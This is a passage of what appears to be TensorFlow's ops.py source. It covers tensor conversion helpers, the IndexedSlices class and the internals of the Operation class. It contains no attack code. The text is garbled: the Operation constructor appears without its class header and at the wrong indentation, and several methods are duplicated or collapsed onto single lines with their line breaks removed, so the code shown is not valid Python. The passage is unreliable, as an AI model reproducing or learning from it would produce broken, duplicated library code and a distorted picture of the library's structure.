      `values`.
    RuntimeError: If a registered conversion function returns an invalid
      value.
  """
  return internal_convert_n_to_tensor(
      values=values,
      dtype=dtype,
      name=name,
      preferred_dtype=preferred_dtype,
      as_ref=False)
def convert_to_tensor_or_indexed_slices(value, dtype=None, name=None):
  """Converts the given object to a `Tensor` or an `IndexedSlices`.

  `IndexedSlices` and `SparseTensor` inputs are returned unmodified;
  everything else is routed through `convert_to_tensor()`.

  Args:
    value: An `IndexedSlices`, `SparseTensor`, or an object that can be
      consumed by `convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor` or
      `IndexedSlices`.
    name: (Optional.) A name to use if a new `Tensor` is created.

  Returns:
    A `Tensor`, `IndexedSlices`, or `SparseTensor` based on `value`.

  Raises:
    ValueError: If `dtype` does not match the element type of `value`.
  """
  return internal_convert_to_tensor_or_indexed_slices(
      value=value, dtype=dtype, name=name, as_ref=False)


def internal_convert_to_tensor_or_indexed_slices(value,
                                                 dtype=None,
                                                 name=None,
                                                 as_ref=False):
  """Converts the given object to a `Tensor` or an `IndexedSlices`.

  `IndexedSlices` and `SparseTensor` inputs are returned unmodified (after a
  dtype-compatibility check); everything else goes through
  `convert_to_tensor()`.

  Args:
    value: An `IndexedSlices`, `SparseTensor`, or an object that can be
      consumed by `convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor` or
      `IndexedSlices`.
    name: (Optional.) A name to use if a new `Tensor` is created.
    as_ref: True if the caller wants the results as ref tensors.

  Returns:
    A `Tensor`, `IndexedSlices`, or `SparseTensor` based on `value`.

  Raises:
    ValueError: If `dtype` does not match the element type of `value`.
  """
  if not isinstance(value, _TensorLike):
    return internal_convert_to_tensor(
        value, dtype=dtype, name=name, as_ref=as_ref)
  # Already tensor-like: pass through, but verify dtype compatibility first.
  if dtype and not dtypes.as_dtype(dtype).is_compatible_with(value.dtype):
    raise ValueError(
        "Tensor conversion requested dtype %s for Tensor with dtype %s: %r" %
        (dtypes.as_dtype(dtype).name, value.dtype.name, str(value)))
  return value


def internal_convert_n_to_tensor_or_indexed_slices(values,
                                                   dtype=None,
                                                   name=None,
                                                   as_ref=False):
  """Converts `values` to a list of `Tensor` or `IndexedSlices` objects.

  Any `IndexedSlices` or `SparseTensor` objects in `values` are passed
  through unmodified, and `None` entries are preserved as-is.

  Args:
    values: A list of `None`, `IndexedSlices`, `SparseTensor`, or objects
      that can be consumed by `convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor`
      `IndexedSlices`.
    name: (Optional.) A name prefix to used when a new `Tensor` is created,
      in which case element `i` will be given the name `name + '_' + i`.
    as_ref: True if the caller wants the results as ref tensors.

  Returns:
    A list of `Tensor`, `IndexedSlices`, and/or `SparseTensor` objects.

  Raises:
    TypeError: If no conversion function is registered for an element in
      `values`.
    RuntimeError: If a registered conversion function returns an invalid
      value.
  """
  if not isinstance(values, collections.Sequence):
    raise TypeError("values must be a list.")
  converted = []
  for index, value in enumerate(values):
    if value is None:
      converted.append(None)
      continue
    element_name = None if name is None else "%s_%d" % (name, index)
    converted.append(
        internal_convert_to_tensor_or_indexed_slices(
            value, dtype=dtype, name=element_name, as_ref=as_ref))
  return converted


def convert_n_to_tensor_or_indexed_slices(values, dtype=None, name=None):
  """Converts `values` to a list of `Tensor` or `IndexedSlices` objects.

  Any `IndexedSlices` or `SparseTensor` objects in `values` are returned
  unmodified.

  Args:
    values: A list of `None`, `IndexedSlices`, `SparseTensor`, or objects
      that can be consumed by `convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor`
      `IndexedSlices`.
    name: (Optional.) A name prefix to used when a new `Tensor` is created,
      in which case element `i` will be given the name `name + '_' + i`.

  Returns:
    A list of `Tensor`, `IndexedSlices`, and/or `SparseTensor` objects.

  Raises:
    TypeError: If no conversion function is registered for an element in
      `values`.
    RuntimeError: If a registered conversion function returns an invalid
      value.
  """
  return internal_convert_n_to_tensor_or_indexed_slices(
      values=values, dtype=dtype, name=name, as_ref=False)


# TODO(josh11b): Add ctx argument to conversion_func() signature.
def register_tensor_conversion_function(base_type,
                                        conversion_func,
                                        priority=100):
  """Registers a function for converting objects of `base_type` to `Tensor`.

  The conversion function must have the following signature:

  ```python
      def conversion_func(value, dtype=None, name=None, as_ref=False):
        # ...
  ```

  It must return a `Tensor` with the given `dtype` if specified. If the
  conversion function creates a new `Tensor`, it should use the given
  `name` if specified. All exceptions will be propagated to the caller.

  The conversion function may return `NotImplemented` for some
  inputs. In this case, the conversion process will continue to try
  subsequent conversion functions.

  If `as_ref` is true, the function must return a `Tensor` reference,
  such as a `Variable`.

  NOTE: The conversion functions will execute in order of priority,
  followed by order of registration. To ensure that a conversion function
  `F` runs before another conversion function `G`, ensure that `F` is
  registered with a smaller priority than `G`.

  Args:
    base_type: The base type or tuple of base types for all objects that
      `conversion_func` accepts.
    conversion_func: A function that converts instances of `base_type` to
      `Tensor`.
    priority: Optional integer that indicates the priority for applying this
      conversion function. Conversion functions with smaller priority values
      run earlier than conversion functions with larger priority values.
      Defaults to 100.

  Raises:
    TypeError: If the arguments do not have the appropriate type.
  """
  global _tensor_conversion_func_cache
  with _tensor_conversion_func_lock:
    is_single_type = isinstance(base_type, type)
    is_tuple_of_types = (
        isinstance(base_type, tuple) and
        all(isinstance(x, type) for x in base_type))
    if not (is_single_type or is_tuple_of_types):
      raise TypeError("base_type must be a type or a tuple of types.")
    if not callable(conversion_func):
      raise TypeError("conversion_func must be callable.")
    _tensor_conversion_func_registry.setdefault(priority, []).append(
        (base_type, conversion_func))
    # Per-type lookups may now be stale; drop the cache so it is rebuilt
    # lazily on the next conversion.
    _tensor_conversion_func_cache = {}
class IndexedSlices(_TensorLike):
  """A sparse representation of a set of tensor slices at given indices.

  This class is a simple wrapper for a pair of `Tensor` objects:

  * `values`: A `Tensor` of any dtype with shape `[D0, D1, ..., Dn]`.
  * `indices`: A 1-D integer `Tensor` with shape `[D0]`.

  An `IndexedSlices` is typically used to represent a subset of a larger
  tensor `dense` of shape `[LARGE0, D1, .. , DN]` where `LARGE0 >> D0`.
  The values in `indices` are the indices in the first dimension of
  the slices that have been extracted from the larger tensor.

  The dense tensor `dense` represented by an `IndexedSlices` `slices` has

  ```python
  dense[slices.indices[i], :, :, :, ...] = slices.values[i, :, :, :, ...]
  ```

  The `IndexedSlices` class is used principally in the definition of
  gradients for operations that have sparse gradients (e.g. @{tf.gather}).

  Contrast this representation with @{tf.SparseTensor}, which uses
  multi-dimensional indices and scalar values.
  """

  def __init__(self, values, indices, dense_shape=None):
    """Creates an `IndexedSlices`."""
    # Validates that all inputs belong to the same graph (raises otherwise).
    _get_graph_from_inputs([values, indices, dense_shape])
    self._values = values
    self._indices = indices
    self._dense_shape = dense_shape

  @property
  def values(self):
    """A `Tensor` containing the values of the slices."""
    return self._values

  @property
  def indices(self):
    """A 1-D `Tensor` containing the indices of the slices."""
    return self._indices

  @property
  def dense_shape(self):
    """A 1-D `Tensor` containing the shape of the corresponding dense tensor."""
    return self._dense_shape

  @property
  def name(self):
    """The name of this `IndexedSlices`."""
    return self.values.name

  @property
  def device(self):
    """The name of the device on which `values` will be produced, or `None`."""
    return self.values.device

  @property
  def op(self):
    """The `Operation` that produces `values` as an output."""
    return self.values.op

  @property
  def dtype(self):
    """The `DType` of elements in this tensor."""
    return self.values.dtype

  @property
  def graph(self):
    """The `Graph` that contains the values, indices, and shape tensors."""
    return self._values.graph

  def __str__(self):
    return "IndexedSlices(indices=%s, values=%s%s)" % (
        self._indices, self._values,
        (", dense_shape=%s" % self._dense_shape)
        if self._dense_shape is not None else "")

  def __neg__(self):
    return IndexedSlices(-self.values, self.indices, self.dense_shape)


# Plain-value (numpy-backed) counterpart of IndexedSlices, e.g. as returned
# by Session.run().
IndexedSlicesValue = collections.namedtuple(
    "IndexedSlicesValue", ["values", "indices", "dense_shape"])


def _device_string(dev_spec):
  # Accepts either a DeviceSpec or an already-formatted device string.
  if isinstance(dev_spec, pydev.DeviceSpec):
    return dev_spec.to_string()
  else:
    return dev_spec


def _NodeDef(op_type, name, device=None, attrs=None):  # pylint: disable=redefined-outer-name
  """Create a NodeDef proto.

  Args:
    op_type: Value for the "op" attribute of the NodeDef proto.
    name: Value for the "name" attribute of the NodeDef proto.
    device: string, device, or function from NodeDef to string.
      Value for the "device" attribute of the NodeDef proto.
    attrs: Optional dictionary where the key is the attribute name (a string)
      and the value is the respective "attr" attribute of the NodeDef proto (an
      AttrValue).

  Returns:
    A node_def_pb2.NodeDef protocol buffer.
  """
  node_def = node_def_pb2.NodeDef()
  node_def.op = compat.as_bytes(op_type)
  node_def.name = compat.as_bytes(name)
  if attrs is not None:
    for k, v in six.iteritems(attrs):
      node_def.attr[k].CopyFrom(v)
  if device is not None:
    # `device` may be a callable computing the device from the NodeDef.
    if callable(device):
      node_def.device = device(node_def)
    else:
      node_def.device = _device_string(device)
  return node_def


# Copied from core/framework/node_def_util.cc
# TODO(mrry,josh11b): Consolidate this validation in C++ code.
_VALID_OP_NAME_REGEX = re.compile("^[A-Za-z0-9.][A-Za-z0-9_.\\-/]*$")
_VALID_SCOPE_NAME_REGEX = re.compile("^[A-Za-z0-9_.\\-/]*$")
  def __init__(self,
               node_def,
               g,
               inputs=None,
               output_types=None,
               control_inputs=None,
               input_types=None,
               original_op=None,
               op_def=None):
    r"""Creates an `Operation`.

    NOTE: This constructor validates the name of the `Operation` (passed
    as `node_def.name`). Valid `Operation` names match the following
    regular expression:

        [A-Za-z0-9.][A-Za-z0-9_.\\-/]*

    Args:
      node_def: `node_def_pb2.NodeDef`.  `NodeDef` for the `Operation`.
        Used for attributes of `node_def_pb2.NodeDef`, typically `name`,
        `op`, and `device`.  The `input` attribute is irrelevant here
        as it will be computed when generating the model.
      g: `Graph`. The parent graph.
      inputs: list of `Tensor` objects. The inputs to this `Operation`.
      output_types: list of `DType` objects.  List of the types of the
        `Tensors` computed by this operation.  The length of this list
        indicates the number of output endpoints of the `Operation`.
      control_inputs: list of operations or tensors from which to have a
        control dependency.
      input_types: List of `DType` objects representing the types of the
        tensors accepted by the `Operation`.  By default uses
        `[x.dtype.base_dtype for x in inputs]`.  Operations that expect
        reference-typed inputs must specify these explicitly.
      original_op: Optional. Used to associate the new `Operation` with an
        existing `Operation` (for example, a replica with the op that was
        replicated).
      op_def: Optional. The `op_def_pb2.OpDef` proto that describes the
        op type that this `Operation` represents.

    Raises:
      TypeError: if control inputs are not Operations or Tensors,
        or if `node_def` is not a `NodeDef`,
        or if `g` is not a `Graph`,
        or if `inputs` are not tensors,
        or if `inputs` and `input_types` are incompatible.
      ValueError: if the `node_def` name is not valid.
    """
    # --- Validate arguments. -----------------------------------------------
    if not isinstance(node_def, node_def_pb2.NodeDef):
      raise TypeError("node_def needs to be a NodeDef: %s" % node_def)
    # Serialized protobufs are limited to 2GB.
    if node_def.ByteSize() >= (1 << 31) or node_def.ByteSize() < 0:
      raise ValueError(
          "Cannot create a tensor proto whose content is larger than 2GB.")
    if not _VALID_OP_NAME_REGEX.match(node_def.name):
      raise ValueError("'%s' is not a valid node name" % node_def.name)
    if not isinstance(g, Graph):
      raise TypeError("g needs to be a Graph: %s" % g)
    self._node_def = copy.deepcopy(node_def)
    self._graph = g

    if inputs is None:
      inputs = []
    elif not isinstance(inputs, list):
      raise TypeError("inputs needs to be a list of Tensors: %s" % inputs)
    self._inputs = list(inputs)  # Defensive copy.
    for a in self._inputs:
      if not isinstance(a, Tensor):
        raise TypeError("input needs to be a Tensor: %s" % a)
      # Mark that we consume the inputs.
      a._add_consumer(self)  # pylint: disable=protected-access

    if output_types is None:
      output_types = []
    self._output_types_val = output_types
    # Create one output Tensor per declared output type.
    self._outputs = [
        Tensor(self, i, output_type)
        for i, output_type in enumerate(output_types)
    ]

    if input_types is None:
      input_types = [i.dtype.base_dtype for i in self._inputs]
    else:
      if not all(
          x.is_compatible_with(i.dtype)
          for i, x in zip(self._inputs, input_types)):
        raise TypeError("In op '%s', input types (%s) are not compatible "
                        "with expected types (%s)" %
                        (self.node_def.name, [i.dtype for i in self._inputs],
                         input_types))
    self._input_types_val = input_types

    # Build the list of control inputs (normalizing tensors to their ops).
    self._control_inputs = []
    if control_inputs:
      for c in control_inputs:
        c_op = None
        if isinstance(c, Operation):
          c_op = c
        elif isinstance(c, (Tensor, IndexedSlices)):
          c_op = c.op
        else:
          raise TypeError("Control input must be an Operation, "
                          "a Tensor, or IndexedSlices: %s" % c)
        self._control_inputs.append(c_op)

    self._original_op = original_op
    self._op_def = op_def
    self._traceback = self._graph._extract_stack()  # pylint: disable=protected-access

    # Define self._c_op before calling self._control_flow_context.AddOp(),
    # since that will call methods on this op that check if self._c_op is set.
    self._c_op = None

    # Add this op to the current control flow context:
    self._control_flow_context = g._get_control_flow_context()  # pylint: disable=protected-access
    if self._control_flow_context is not None:
      # TODO(skyewm): consider refactoring this to call self._create_c_op()
      # first. This would require updating the TF_Operation's ID (see the
      # comment and self._id_value update below). The disadvantage of calling
      # AddOp() first is that we need to maintain Operation state that is
      # accessed by AddOp() in Python, e.g. the input Tensors.
      self._control_flow_context.AddOp(self)
    # NOTE(keveman): Control flow context's AddOp could be creating new ops and
    # setting op.inputs[index] = new_op. Thus the new ops' id could be larger
    # than this op's id even though this op depend on them. Therefore, delaying
    # assigning id to this op until all ops this could be dependent on are
    # created.
    self._id_value = self._graph._next_id()  # pylint: disable=protected-access
    self._recompute_node_def()

    if self._graph._c_graph:  # pylint: disable=protected-access
      if self._op_def:
        # TODO(skyewm): op_def_library.apply_op() flattens the incoming
        # inputs. Refactor so we don't have to do this here.
        grouped_inputs = self._reconstruct_sequence_inputs(
            self._op_def, self._inputs, self._node_def.attr)
      else:
        # If no OpDef is specified, assume all inputs are scalar.
        grouped_inputs = self._inputs

      self._c_op = self._create_c_op(self._graph, self._node_def,
                                     grouped_inputs, self._control_inputs)
grouped_inputs = self._inputs self._c_op = self._create_c_op(self._graph, self._node_def, grouped_inputs, self._control_inputs) def _create_c_op(self, graph, node_def, inputs, control_inputs): """Creates a TF_Operation. Args: graph: a `Graph`. node_def: `node_def_pb2.NodeDef` for the operation to create. inputs: A list of `Tensor`s (corresponding to scalar inputs) and lists of `Tensor`s (corresponding to sequence inputs, e.g. "int64 * N", "list(int64)"). The length of the list should be equal to the number of inputs specified by this operation's op def. control_inputs: A list of `Operation`s to set as control dependencies. Returns: A wrapped TF_Operation*. """ # pylint: disable=protected-access op_desc = c_api.TF_NewOperation(graph._c_graph, compat.as_str(node_def.op), compat.as_str(node_def.name)) # Add inputs for op_input in inputs: if isinstance(op_input, (list, tuple)): c_api.TF_AddInputList(op_desc, [t._as_tf_output() for t in op_input]) else: c_api.TF_AddInput(op_desc, op_input._as_tf_output()) # Add control inputs for control_input in control_inputs: c_api.TF_AddControlInput(op_desc, control_input._c_op) # pylint: enable=protected-access # Add attrs for name, attr_value in node_def.attr.items(): serialized = attr_value.SerializeToString() # TODO(skyewm): this creates and deletes a new TF_Status for every attr. # It might be worth creating a convenient way to re-use the same status. with errors.raise_exception_on_not_ok_status() as status: c_api.TF_SetAttrValueProto(op_desc, compat.as_str(name), serialized, status) with errors.raise_exception_on_not_ok_status() as status: c_op = c_api.TF_FinishOperation(op_desc, status) return c_op def _reconstruct_sequence_inputs(self, op_def, inputs, attrs): """Regroups a flat list of input tensors into scalar and sequence inputs. Args: op_def: The `op_def_pb2.OpDef` (for knowing the input types) inputs: a list of input `Tensor`s to the op. 
attrs: mapping from attr name to `attr_value_pb2.AttrValue` (these define how long each sequence is) Returns: A list of `Tensor`s (corresponding to scalar inputs) and lists of `Tensor`s (corresponding to sequence inputs). """ grouped_inputs = [] i = 0 for input_arg in op_def.input_arg: if input_arg.number_attr: input_len = attrs[input_arg.number_attr].i is_sequence = True elif input_arg.type_list_attr: input_len = len(attrs[input_arg.type_list_attr].list.type) is_sequence = True else: input_len = 1 is_sequence = False if is_sequence: grouped_inputs.append(inputs[i:i + input_len]) else: grouped_inputs.append(inputs[i]) i += input_len assert i == len(inputs) return grouped_inputs def colocation_groups(self): """Returns the list of colocation groups of the op.""" default_colocation_group = [ compat.as_bytes("loc:@%s" % self._node_def.name) ] if "_class" not in self._node_def.attr: # This op has no explicit colocation group, so it is itself its # own root of a colocation group. return default_colocation_group attr_groups = [ class_name for class_name in self.get_attr("_class") if class_name.startswith(b"loc:@") ] # If there are no colocation groups in the explicit _class field, # return the default colocation group. return attr_groups if attr_groups else default_colocation_group def values(self): """DEPRECATED: Use outputs.""" return tuple(self.outputs) def _get_control_flow_context(self): """Returns the control flow context of this op. Returns: A context object. """ return self._control_flow_context def _set_control_flow_context(self, ctx): """Sets the current control flow context of this op. Args: ctx: a context object. """ self._control_flow_context = ctx @property def name(self): """The full name of this operation.""" if self._c_op: # TODO(iga): Remove this assert after converting to C API by default. # Just being a bit paranoid here. 
  @property
  def _id(self):
    """The unique integer id of this operation."""
    return self._id_value

  @property
  def device(self):
    """The name of the device to which this op has been assigned, if any.

    Returns:
      The string name of the device to which this op has been assigned, or an
      empty string if it has not been assigned to a device.
    """
    if self._c_op:
      # TODO(iga): Remove this assert after converting to C API by default.
      # Just being a bit paranoid here
      assert self._node_def.device == c_api.TF_OperationDevice(self._c_op)
      return c_api.TF_OperationDevice(self._c_op)
    else:
      return self._node_def.device

  @property
  def _output_types(self):
    """List this operation's output types.

    Returns:
      List of the types of the Tensors computed by this operation.
      Each element in the list is an integer whose value is one of
      the TF_DataType enums defined in c_api.h
      The length of this list indicates the number of output endpoints
      of the operation.
    """
    if self._c_op:
      num_outputs = c_api.TF_OperationNumOutputs(self._c_op)
      output_types = [
          c_api.TF_OperationOutputType(self._tf_output(i))
          for i in xrange(num_outputs)
      ]
      # TODO(iga): Remove this assert after converting to C API by default.
      # Just being a bit paranoid here.
      assert self._output_types_val == output_types
      # In all the tests we have output_types that are passed into
      # Operation.__init__ are a list of ints (which is illegal according
      # to the docstring), but input_types are instances of DType.
      # This extra assert is to catch if we ever use DType for output_types.
      if output_types:
        assert isinstance(output_types[0], int)
      return output_types
    else:
      return self._output_types_val

  def _tf_output(self, output_idx):
    """Create and return a new TF_Output for output_idx'th output of this op."""
    assert self._c_op
    tf_output = c_api.TF_Output()
    tf_output.oper = self._c_op
    tf_output.index = output_idx
    return tf_output

  def _tf_input(self, input_idx):
    """Create and return a new TF_Input for input_idx'th input of this op."""
    assert self._c_op
    tf_input = c_api.TF_Input()
    tf_input.oper = self._c_op
    tf_input.index = input_idx
    return tf_input

  def _set_device(self, device):  # pylint: disable=redefined-outer-name
    """Set the device of this operation.

    Args:
      device: string or device..  The device to set.
    """
    if self._c_op:
      c_api.SetRequestedDevice(
          self._graph._c_graph,  # pylint: disable=protected-access
          self._c_op,  # pylint: disable=protected-access
          _device_string(device))
    # TODO(nolivia): remove this line when switch to C api
    self._node_def.device = _device_string(device)

  def _add_input(self, tensor, dtype=None):
    """Add a new input to this operation.

    Args:
      tensor: the Tensor to add as an input.
      dtype: tf.DType: type of the input; defaults to
        the tensor's dtype.

    Raises:
      TypeError: if tensor is not a Tensor,
        or if input tensor type is not convertible to dtype.
      ValueError: if the Tensor is from a different graph.
    """
    # Input mutation is only supported on the pure-Python graph path.
    assert not self._c_op, (
        "Operation._add_input doesn't work with C API")
    if not isinstance(tensor, Tensor):
      raise TypeError("tensor must be a Tensor: %s" % tensor)
    _assert_same_graph(self, tensor)
    if dtype is None:
      dtype = tensor.dtype
    else:
      dtype = dtypes.as_dtype(dtype)
      if not dtype.is_compatible_with(tensor.dtype):
        raise TypeError(
            "Cannot convert a tensor of type %s to an input of type %s" %
            (tensor.dtype.name, dtype.name))
    self._inputs.append(tensor)
    self._input_types_val.append(dtype)
    tensor._add_consumer(self)  # pylint: disable=protected-access
    self._recompute_node_def()
""" assert not self._c_op, ( "Operation._add_input doesn't work with C API") if not isinstance(tensor, Tensor): raise TypeError("tensor must be a Tensor: %s" % tensor) _assert_same_graph(self, tensor) if dtype is None: dtype = tensor.dtype else: dtype = dtypes.as_dtype(dtype) if not dtype.is_compatible_with(tensor.dtype): raise TypeError( "Cannot convert a tensor of type %s to an input of type %s" % (tensor.dtype.name, dtype.name)) self._inputs.append(tensor) self._input_types_val.append(dtype) tensor._add_consumer(self) # pylint: disable=protected-access self._recompute_node_def() def _update_input(self, index, tensor, dtype=None): """Update the input to this operation at the given index. NOTE: This is for TF internal use only. Please don't use it. Args: index: the index of the input to update. tensor: the Tensor to be used as the input at the given index. dtype: tf.DType: type of the input; defaults to the tensor's dtype. Raises: TypeError: if tensor is not a Tensor, or if input tensor type is not convertible to dtype. ValueError: if the Tensor is from a different graph. """ if not isinstance(tensor, Tensor): raise TypeError("tensor must be a Tensor: %s" % tensor) _assert_same_graph(self, tensor) if self._c_op: with errors.raise_exception_on_not_ok_status() as status: c_api.UpdateEdge( self._graph._c_graph, # pylint: disable=protected-access tensor._as_tf_output(), # pylint: disable=protected-access self._tf_input(index), status) else: if dtype is None: dtype = tensor.dtype else: dtype = dtypes.as_dtype(dtype) if not dtype.is_compatible_with(tensor.dtype): raise TypeError( "Cannot convert a tensor of type %s to an input of type %s" % (tensor.dtype.name, dtype.name)) self._inputs[index].consumers().remove(self) self._inputs[index] = tensor self._input_types_val[index] = dtype tensor._add_consumer(self) # pylint: disable=protected-access self._recompute_node_def() def _add_control_inputs(self, ops): """Add a list of new control inputs to this operation. 
Args: ops: the list of Operations to add as control input. Raises: TypeError: if ops is not a list of Operations. ValueError: if any op in ops is from a different graph. """ if self._c_op: for op in ops: if not isinstance(op, Operation): raise TypeError("op must be an Operation: %s" % op) c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op) # pylint: disable=protected-access else: if ops: for op in ops: if not isinstance(op, Operation): raise TypeError("op must be an Operation: %s" % op) _assert_same_graph(self, op) self._control_inputs.append(op) self._recompute_node_def() def _add_control_input(self, op): """Add a new control input to this operation. Args: op: the Operation to add as control input. Raises: TypeError: if op is not an Operation. ValueError: if op is from a different graph. """ if self._c_op: if not isinstance(op, Operation): raise TypeError("op must be an Operation: %s" % op) c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op) # pylint: disable=protected-access else: self._add_control_inputs([op]) # Methods below are used when building the NodeDef and Graph proto. 
  def _recompute_node_def(self):
    # Rebuild self._node_def.input from the Python-side edge lists: regular
    # inputs first, then control inputs encoded as "^name" entries. Legacy
    # (non-C-API) mode only; in C-API mode the C graph owns this.
    del self._node_def.input[:]  # pylint: disable=protected-access
    self._node_def.input.extend([t._as_node_def_input() for t in self._inputs])
    # pylint: enable=protected-access
    if self._control_inputs:
      self._node_def.input.extend(
          ["^%s" % op.name for op in self._control_inputs])

  def __str__(self):
    return str(self._node_def)

  def __repr__(self):
    return "<tf.Operation '%s' type=%s>" % (self.name, self.type)

  @property
  def outputs(self):
    """The list of `Tensor` objects representing the outputs of this op."""
    return self._outputs

# pylint: disable=protected-access
  class _InputList(object):
    """Immutable input list wrapper."""

    def __init__(self, op):
      self._op = op

    def __iter__(self):
      return iter(self._op._inputs)

    def __len__(self):
      return len(self._op._inputs)

    def __bool__(self):
      return bool(self._op._inputs)

    # Python 3 wants __bool__, Python 2.7 wants __nonzero__
    __nonzero__ = __bool__

    def __getitem__(self, i):
      return self._op._inputs[i]

# pylint: enable=protected-access

  @property
  def inputs(self):
    """The list of `Tensor` objects representing the data inputs of this op."""
    if self._c_op:
      tf_outputs = c_api.GetOperationInputs(self._c_op)
      # TODO(skyewm): return Operation._InputList
      # pylint: disable=protected-access
      return [self.graph._get_tensor_by_tf_output(tf_output)
              for tf_output in tf_outputs]
      # pylint: enable=protected-access
    else:
      return Operation._InputList(self)

  @property
  def _input_dtypes(self):
    return self._input_types

  @property
  def _input_types(self):
    if self._c_op:
      num_inputs = c_api.TF_OperationNumInputs(self._c_op)
      input_types = [
          dtypes.as_dtype(c_api.TF_OperationInputType(self._tf_input(i)))
          for i in xrange(num_inputs)
      ]
      # TODO(iga): Remove this assert after converting to C API by default.
      # Just being a bit paranoid here.
      assert self._input_types_val == input_types
      return input_types
    else:
      return self._input_types_val

  @property
  def control_inputs(self):
    """The `Operation` objects on which this op has a control dependency.

    Before this op is executed, TensorFlow will ensure that the
    operations in `self.control_inputs` have finished executing.  This
    mechanism can be used to run ops sequentially for performance
    reasons, or to ensure that the side effects of an op are observed
    in the correct order.

    Returns:
      A list of `Operation` objects.
    """
    if self._c_op:
      control_c_ops = c_api.TF_OperationGetControlInputs_wrapper(self._c_op)
      # pylint: disable=protected-access
      return [
          self.graph._get_operation_by_name_unsafe(
              c_api.TF_OperationName(c_op)) for c_op in control_c_ops
      ]
      # pylint: enable=protected-access
    else:
      return self._control_inputs

  @property
  def type(self):
    """The type of the op (e.g. `"MatMul"`)."""
    if self._c_op:
      op_type = c_api.TF_OperationOpType(self._c_op)
      # TODO(iga): Remove these asserts after converting to C API by default.
      # Just being a bit paranoid here.
      # pylint: disable=unidiomatic-typecheck
      assert type(op_type) == type(self._node_def.op), (
          "Expected same types %s vs %s" % (type(op_type),
                                            type(self._node_def.op)))
      # pylint: enable=unidiomatic-typecheck
      assert op_type == self._node_def.op
      return op_type
    else:
      return self._node_def.op

  @property
  def graph(self):
    """The `Graph` that contains this operation."""
    return self._graph

  @property
  def node_def(self):
    # pylint: disable=line-too-long
    """Returns a serialized `NodeDef` representation of this operation.

    Returns:
      A
      [`NodeDef`](https://www.tensorflow.org/code/tensorflow/core/framework/node_def.proto)
      protocol buffer.
    """
    # pylint: enable=line-too-long
    return self._node_def

  @property
  def op_def(self):
    # pylint: disable=line-too-long
    """Returns the `OpDef` proto that represents the type of this op.

    Returns:
      An
      [`OpDef`](https://www.tensorflow.org/code/tensorflow/core/framework/op_def.proto)
      protocol buffer.
    """
    # pylint: enable=line-too-long
    if self._c_op:
      with errors.raise_exception_on_not_ok_status() as status:
        with c_api_util.tf_buffer() as buf:
          # pylint: disable=protected-access
          c_api.TF_GraphGetOpDef(self._graph._c_graph,
                                 compat.as_bytes(self.type), buf, status)
          # pylint: enable=protected-access
          data = c_api.TF_GetBuffer(buf)
      op_def = op_def_pb2.OpDef()
      op_def.ParseFromString(compat.as_bytes(data))
      return op_def
    else:
      return self._op_def

  @property
  def traceback(self):
    """Returns the call stack from when this operation was constructed."""
    return self._graph._convert_stack(self._traceback)  # pylint: disable=protected-access

  @property
  def traceback_with_start_lines(self):
    """Same as traceback but includes start line of function definition.

    Returns:
      A list of 5-tuples (filename, lineno, name, code, func_start_lineno).
    """
    return self._graph._convert_stack(  # pylint: disable=protected-access
        self._traceback, include_func_start_lineno=True)

  def _set_attr(self, attr_name, attr_value):
    """Private method used to set an attribute in the node_def."""
    if not _USE_C_API:
      # NOTE(review): asserting a non-empty string literal is always True, so
      # this assert can never fire; `assert False, "..."` was presumably
      # intended. As written, the method is silently a no-op without C API.
      assert "_set_attr not supported with _USE_C_API == False"
      return
    buf = c_api.TF_NewBufferFromString(
        compat.as_bytes(attr_value.SerializeToString()))
    try:
      with errors.raise_exception_on_not_ok_status() as status:
        # pylint: disable=protected-access
        c_api.SetAttr(self._graph._c_graph, self._c_op, attr_name, buf, status)
        # pylint: enable=protected-access
    finally:
      # Always release the C buffer, even if SetAttr raised.
      c_api.TF_DeleteBuffer(buf)

  def get_attr(self, name):
    """Returns the value of the attr of this op with the given `name`.

    Args:
      name: The name of the attr to fetch.

    Returns:
      The value of the attr, as a Python object.

    Raises:
      ValueError: If this op does not have an attr with the given `name`.
    """
    if _USE_C_API:
      try:
        # TODO(b/65162920): remove this try/except block when all attrs are
        # implemented to use the _set_attr method instead of node_def.attr.
        with errors.raise_exception_on_not_ok_status() as status:
          metadata = c_api.TF_OperationGetAttrMetadata(self._c_op, name, status)
        with errors.raise_exception_on_not_ok_status() as status:
          # Fast path: only scalar int attrs are fetched via the C API here;
          # everything else falls through to the NodeDef-based logic below.
          if metadata.type == c_api.TF_ATTR_INT and metadata.is_list == 0:
            return c_api.TF_OperationGetAttrInt(self._c_op, name, status)
      except errors.InvalidArgumentError:
        # Colocation ops are failing to find attrs beginning with "_*". They
        # should fall through to the not-CAPI logic until the attribute is set
        # via the C-API always.
        pass

    fields = ["s", "i", "f", "b", "type", "shape", "tensor", "func"]
    if name not in self._node_def.attr:
      raise ValueError("No attr named '" + name + "' in " + str(self._node_def))
    x = self._node_def.attr[name]

    # Treat an empty oneof value as an empty list.
    if not x.WhichOneof("value"):
      return []
    if x.HasField("list"):
      for f in fields:
        if getattr(x.list, f):
          if f == "type":
            # NOTE: the comprehension variable deliberately shadows the outer
            # `x` (harmless in Python 3, where comprehensions have own scope).
            return [dtypes.as_dtype(x) for x in list(getattr(x.list, f))]
          else:
            return list(getattr(x.list, f))
      return []
    else:
      for f in fields:
        if x.HasField(f):
          if f == "type":
            return dtypes.as_dtype(getattr(x, f))
          else:
            return getattr(x, f)
      assert False, "Unsupported field type in " + str(x)

  def run(self, feed_dict=None, session=None):
    """Runs this operation in a `Session`.

    Calling this method will execute all preceding operations that
    produce the inputs needed for this operation.

    *N.B.* Before invoking `Operation.run()`, its graph must have been
    launched in a session, and either a default session must be
    available, or `session` must be specified explicitly.

    Args:
      feed_dict: A dictionary that maps `Tensor` objects to feed values.
        See @{tf.Session.run}
        for a description of the valid feed values.
      session: (Optional.) The `Session` to be used to run to this operation. If
        none, the default session will be used.
    """
    _run_using_default_session(self, feed_dict, self.graph, session)


# Global registry mapping op-type strings to their gradient functions.
_gradient_registry = registry.Registry("gradient")


class RegisterGradient(object):
  """A decorator for registering the gradient function for an op type.

  This decorator is only used when defining a new op type. For an op
  with `m` inputs and `n` outputs, the gradient function is a function
  that takes the original `Operation` and `n` `Tensor` objects
  (representing the gradients with respect to each output of the op),
